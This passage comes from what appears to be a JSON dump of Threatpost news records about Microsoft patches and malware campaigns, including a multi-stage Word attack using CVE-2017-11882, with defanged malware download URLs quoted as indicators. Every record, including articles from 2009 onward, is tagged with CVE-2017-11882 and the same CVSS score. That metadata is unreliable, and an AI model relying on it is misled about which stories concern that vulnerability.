Reguly. \u201cBut MS09-008 only mitigates the problem, it doesn\u2019t patch it.\u201d\n\nRead [the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9129722&source=rss_topic17>) [computerworld.com]. \n\nAlso see [nCircle\u2019s original advisory](<http://blog.ncircle.com/blogs/vert/archives/2009/03/successful_exploit_renders_mic.html>) [ncircle.com] and the [reaction from Microsoft\u2019s security response](<http://blogs.technet.com/srd/archive/2009/03/13/ms09-008-dns-and-wins-server-security-update-in-more-detail.aspx>) [technet.com] team.\n", "cvss3": {}, "published": "2009-03-17T14:19:18", "type": "threatpost", "title": "Microsoft spars with researcher over security patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:34", "id": "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "href": "https://threatpost.com/microsoft-spars-researcher-over-security-patch-031709/72423/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:07", "description": "[](<https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/>)The IDG News Service is reporting that Microsoft\u2019s latest round of security patches appears to be causing some PCs to seize up and display a black screen, rendering the computer useless. The problem affects Microsoft products including Windows 7, Vista and XP operating systems. \nFrom the article: \n\nMicrosoft apparently made changes to the Access Control List (ACL), a list of permissions for a logged-on user. The ACL interacts with registry keys, creating visible desktop features such as a sidebar. \n\nHowever, the latest patches appear to make some changes to those \nregistry keys. The effect is that some installed applications aren\u2019t \naware of the changes and don\u2019t run properly, causing a black screen.\n\n[Read the full story](<http://www.computerworld.com/s/article/9141568/Latest_Microsoft_patches_cause_black_screen_of_death?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-11-30T15:38:43", "type": "threatpost", "title": "Latest MS Patches Causing Black Screen of Death", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:03:25", "id": "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "href": "https://threatpost.com/latest-ms-patches-causing-black-screen-death-113009/73168/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection string uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from for the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d describes researchers.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201c. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (rich text file format) file.\n\n\u201cWhen user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually a RTF file that is downloaded and executed,\u201d researchers describe.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers a MSHTA command line that downloads and executes an HTML executable HTA file. Next the HTA contains an obfuscated PowerShell Script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. \u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams are using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and add to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with email subject lines \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warn recipients they face pending tax-related law enforcement action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in a Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Email with the subject line \u201cI need a CPA\u201d contain the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains a malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. \u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. Even if the emails came from someone you know, be wary about opening the attachment or click on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:58", "description": "[](<https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/>)Windows 8 isn\u2019t yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity. \n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad them into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. \n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "cvss3": {}, "published": "2012-11-01T15:32:54", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:18", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for a multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affected all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": "https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 has been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some Javascript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try and renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "description": "Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.\n\nIn a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. The exploit gives the attacker the ability to run arbitrary code on the victim\u2019s machine.\n\n\u201cA vulnerability has been discovered in Micros[](<https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/>)oft Windows, which can be exploited by malicious people to potentially compromise a user\u2019s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large \u201cheight\u201d attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,\u201d the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.\n\nMicrosoft officials have not confirmed the vulnerability, but said that they\u2019re looking into it.\n\n\u201cWe are currently examining the issue and will take appropriate action to help ensure the customers are protected,\u201d Jerry Bryant, group manager of response communications in Microsoft\u2019s Trustworhty Computing Group said.\n\nThe only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. It\u2019s not clear how many of those Safari users are running Windows, but it\u2019s likely that the vast majority of them are running Mac OS X.\n\nHowever, it\u2019s possible that it may turn out that other browsers could be used as attack vectors for this vulnerability as more information becomes available.\n", "cvss3": {}, "published": "2011-12-20T16:01:26", "type": "threatpost", "title": "Researchers Warn of New Windows 7 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:07", "id": "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "href": "https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:05", "description": "[](<https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/>)A prominent researcher will use an upcoming security conference in Buenos Aires to demonstrate an exploit that allows hackers to bypass the Windows Service Isolation feature, despite Microsoft\u2019s efforts to close the security loophole.\n\nSecurity researcher Cesar Cerrudo of [Argeniss Information Security and Software](<http://www.argeniss.com/>) said he will demonstrate an exploit he has developed that would allow hackers to bypass a security feature called Windows Service Isolation, which is intended to make it easier to access Windows objects without requiring a administrator level privileges. Cerrudo will use the upcoming ekoparty Security Conference in Buenos Aires to present his exploit. \n\nWriting to Threatpost.com, Cerrudo said that his presentation will demonstrate a method to bypass the Windows Service Isolation feature, allowing an attacker who is able to upload content to a Windows endpoint running applications such as SQL server and Internet Information Server (IIS) to elevate her privileges from the limited Local Service or Network Service account to the Local System account, providing broad access to install malicious code on or otherwise modify the system. \n\n\u201cFor instance it will allow you to compromise a Windows system if you can upload content to IIS or exploit any process running under (the) Network Service or Local Service account,\u201d Cerrudo wrote.\n\nThe demonstration, if successful, will poke a hole in a protection plan that Microsoft has proposed for the privilege escalation problem \u2013 part of a larger body of research on privilege escalation problems affecting all flavors of Windows that Cerrudo has documented in his paper \u201c[Token Kidnapping\u2019s Revenge](<http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf>).\u201d \n\nThe tendency to run popular services with administrator-level privileges has been exploited in the past by to install malicious programs on Windows systems. Microsoft added the Windows Service Isolation feature as a configuration option for companies that wanted to harden Windows servers and clients against attack. \n\nMicrosoft has responded to the problems raised by Cerrudo and others with a security update to the Windows Tracing Feature for Services, MS10-059 for Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. The company also [issued a security advisory,](<http://www.microsoft.com/technet/security/advisory/2264072.mspx>) for the Windows Service Isolation issue, which provides workarounds for Windows customers running Internet Information Server as well as a security fix for the privilege escalation problem that involves applying an update to the Windows Telephony API. \n\nCerrudo said that the configuration changes suggested by Microsoft will protect Windows machines running IIS, but not other applications. Windows shops that don\u2019t apply the security fix suggested are vulnerable to privilege escalation attacks if they\u2019re running other applications on affected systems. He suggests that Microsoft update its advisory to make it clear that the security fix described in the advisory is a requirement for any customer running applications other than IIS on affected systems. \n\nMicrosoft said it feels confident that its patch and advisory adequately cover the possible attacks that Cerrudo will demonstrate. Jerry Bryant, Group Manager, Trustworthy Computing, Microsoft said that its security advisory addresses \u201cthe potential for attacks that leverage the Windows Service Isolation feature by helping to clarify the proper use and limits of the Windows Service Isolation feature.\u201d However, the company notes that the Windows Service Isolation is a \u201cdefense-in-depth feature, not a proper security boundary\u201d and shouldn\u2019t be treated as such. \n", "cvss3": {}, "published": "2010-09-02T04:28:26", "type": "threatpost", "title": "Researcher Will Demo Bypass of Windows Service Isolation Feature", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:06:25", "id": "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "href": "https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/74416/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:33", "description": "Dennis Fisher and Mike Mimoso discuss the Microsoft malware takedown, its legal and security implications and the revelation of a massive financial fraud campaign in Brazil.\n\nDownload: [digital_underground_157.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_157.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-07-04T09:00:55", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso Discuss This Week's Microsoft Takedown", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:52", "id": "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "href": "https://threatpost.com/threatpost-news-wrap-july-4-2014/107003/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:08", "description": "Microsoft will release seven bulletins in the [October Patch Tuesday](<http://technet.microsoft.com/en-us/security/bulletin/ms12-oct>) next week, fixing 20 total vulnerabilities in Windows, Office, Lync and SQL Server. Only one of the bulletins is rated critical, while the six others are rated important.\n\nThe one critical bulletin affects Microsoft Office 2003, 2007 and 2010 and Microsoft officials said that the bug it will fix can be used for remote code execution. The remaining six bulletins, which all are rated important, also can be used for remote code execution. \n\nThe other software affected by the October bulletins includes SharePoint, Groove Server, SQL Server 2000, 2005, 2008 and 2012. \n\nThe one critical bulletin will fix a flaw in Microsoft Word, company officials said.\n\n\u201cToday we\u2019re providing [advance notification](<http://technet.microsoft.com/security/bulletin/ms12-oct>) of the release of seven bulletins, one Critical and six Important, which address 20 vulnerabilities for October 2012. The Critical bulletin addresses vulnerabilities in Microsoft Word. The six Important-rated bulletins will address issues in Windows, Microsoft Office, and SQL Server. This release will also address the issue in FAST Search Server first described in [Security Advisory 2737111](<http://technet.microsoft.com/security/advisory/2737111>),\u201d Dustin Childs of Microsoft said.\n\nThat bug in FAST Search Server first came to light in July and also existed in Microsoft Exchange Server. \n\n\u201cThe vulnerabilities exist due to the way that files are parsed by the third-party, Oracle Outside In libraries. In the most severe case of Microsoft Exchange Server 2007 and Microsoft Exchange Server 2010, it is possible under certain conditions for the vulnerabilities to allow an attacker to take control of the server process that is parsing a specially crafted file. An attacker could then install programs; view, change, or delete data; or take any other action that the server process has access to do,\u201d Microsoft said in its security advisory at the time.\n", "cvss3": {}, "published": "2012-10-04T18:28:36", "type": "threatpost", "title": "Microsoft to Fix Critical Word Flaw in October Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:25", "id": "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "href": "https://threatpost.com/microsoft-fix-critical-word-flaw-october-patch-tuesday-100412/77083/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:54", "description": "The [Pwn2Own contest at the CanSecWest](<https://threatpost.com/why-pwn2own-whats-right-security-030911/>) conference has become one of the landmark events on the calendar each year, as researchers gather with nervous vendors in a tiny room to see who can own which browser on which platform and how quickly. But this year\u2019s contest will have a much different look than past editions, with participants vying for more than $100,000 in cash by amassing points over the course of three days.\n\nThe new format will include the assignment of point values for each of the various targets in the contest, which typically are browsers such as Internet Explorer, Firefox and Chrome running on Mac OS X or Windows machines. In order to win the contest, a participant must have at least one zero-day vulnerability in one of the targets. Each successful compromise of a target with a zero-day will be worth 32 points, and unlike in past years, targets will not be removed from the competition once they\u2019ve been successfully compromised by one researcher.\n\nAlso, on the first day of the contest, the organizers from HP\u2019s TippingPoint Zero Day Initiative will announce two previously patched vulnerabilities that contestants can use on each target. They will then have three days to write an exploit that works on a given target, although the point awarded for a win will decrease each day. A win on the first day earns 10 points, nine points on the second day and eight on the third. For those \u201cpublic vulnerabilities\u201d, there won\u2019t be any requirement for a sandbox escape or bypass of protected mode in the browsers.\n\nThe changes are the result of a review of past years\u2019 contests and a desire to make the event fairer for everyone involved. In past years, there was a drawing to see which participant would go first on each target, and once it was successfully compromised, it was off the table for everyone else. There also will be first, second and third places this year, with cash rewards of $60,000, $30,000 and $15,000, respectively. The three researchers with the highest point totals at the end of the three-day contest will win the money.\n\n\u201cWe basically rearchitected the entire thing this year. We wanted to take our limited budget and spread it over three winners in order to give them more incentive to bring their vulns to Pwn2Own,\u201d said Aaron Portnoy, the manager of the security research team at TippingPoint. \u201cWe didn\u2019t think it was fair with the drawing. That opens the door for people having a vulnerability they don\u2019t use at the contest and it doesn\u2019t get fixed.\u201d\n\nIn addition to the main cash prizes, contestants also win the laptops that they\u2019re able to successfully compromise targets on. And this year, Google is putting up a prize of $20,000 for every unique set of bugs that can compromise its Chrome browser, without any platform-specific bugs. In order to claim the prize, a participant will have to get full code execution outside of Chrome\u2019s sandbox, but there is no limit to the number of those rewards a researcher can win. So if one participant has three or four of those in his pocket\u2013which seems unlikely\u2013he could earn a serious payday.\n\nGoogle also will pay $10,000 for Chrome vulnerabilities that get code execution outside of the sandbox but also require some OS-specific vulnerability to work, Portnoy said.\n\nThe idea behind all of the changes in this years Pwn2Own is to bring the contest closer to the way it was when it began several years ago. The contest also has dropped mobile devices such as iPhones and Android phones as targets.\n\n\u201cWe\u2019re going back to the roots of Pwn2Own,\u201d Portnoy said. \u201cThe mobile platforms have been a barrier to entry. We expect to see more competitors.\u201d\n\nAll of the new vulnerabilities used in the [Pwn2Own contest](<http://pwn2own.zerodayinitiative.com/>) each year are immediately disclosed to the affected vendors as part of the rules of engagement. The inclusion of the known vulnerabilities in target platforms is a way to test the exploit-writing skills of the researchers, as well as drawing attention to the need for people to patch older bugs.\n\n\u201cWe want to show the importance of patching and want to show that the contest will have active participation over three days,\u201d Portnoy said. \u201cWe want people to watch.\u201d\n\nPortnoy said the list of targets for this year\u2019s contest would be available soon. [CanSecWest](<http://cansecwest.com/index.html>) is March 7-9 this year in Vancouver.\n", "cvss3": {}, "published": "2012-01-23T20:00:06", "type": "threatpost", "title": "Revamped Pwn2Own to Offer $105K in Prizes, Cash From Google for Chrome 0-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:57", "id": "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "href": "https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/76128/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:02", "description": "A few days after MIcrosoft released a patch to fix a vulnerability in ASP.NET that could enable a denial-of-service attack, someone has released exploit code for the vulnerability. \n\nThe proof-of-concept [exploit code](<https://github.com/HybrisDisaster/aspHashDoS>) was posted to the Full Disclosure mailing list and is available for download from GitHUb. Posted by a user named HybrisDisaster, the code is designed to exploit a recently discovered vulnerability in ASP.NET that\u2019s related to the way that the software handles certain HTTP post requests. The vulnerability was first disclosed in late December at the Chaos Communications Congress in Germany.\n\nThe problem isn\u2019t actually specific to ASP.NET, but affects a variety of languages and applications. Microsoft shipped an emergency patch for the flaw on Dec. 29, recommending that users install it as quickly as possible.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Suha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\nThe base cause of the problem is that when ASP.NET comes across a form submission with some specific characteristics, it will need to perform a huge amount of computations that could consume all of the server\u2019s rresources.\n", "cvss3": {}, "published": "2012-01-09T16:00:19", "type": "threatpost", "title": "Exploit Code Released for ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:D58796CB8261B361ADF389131F955AE3", "href": "https://threatpost.com/exploit-code-released-aspnet-flaw-010912/76073/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects 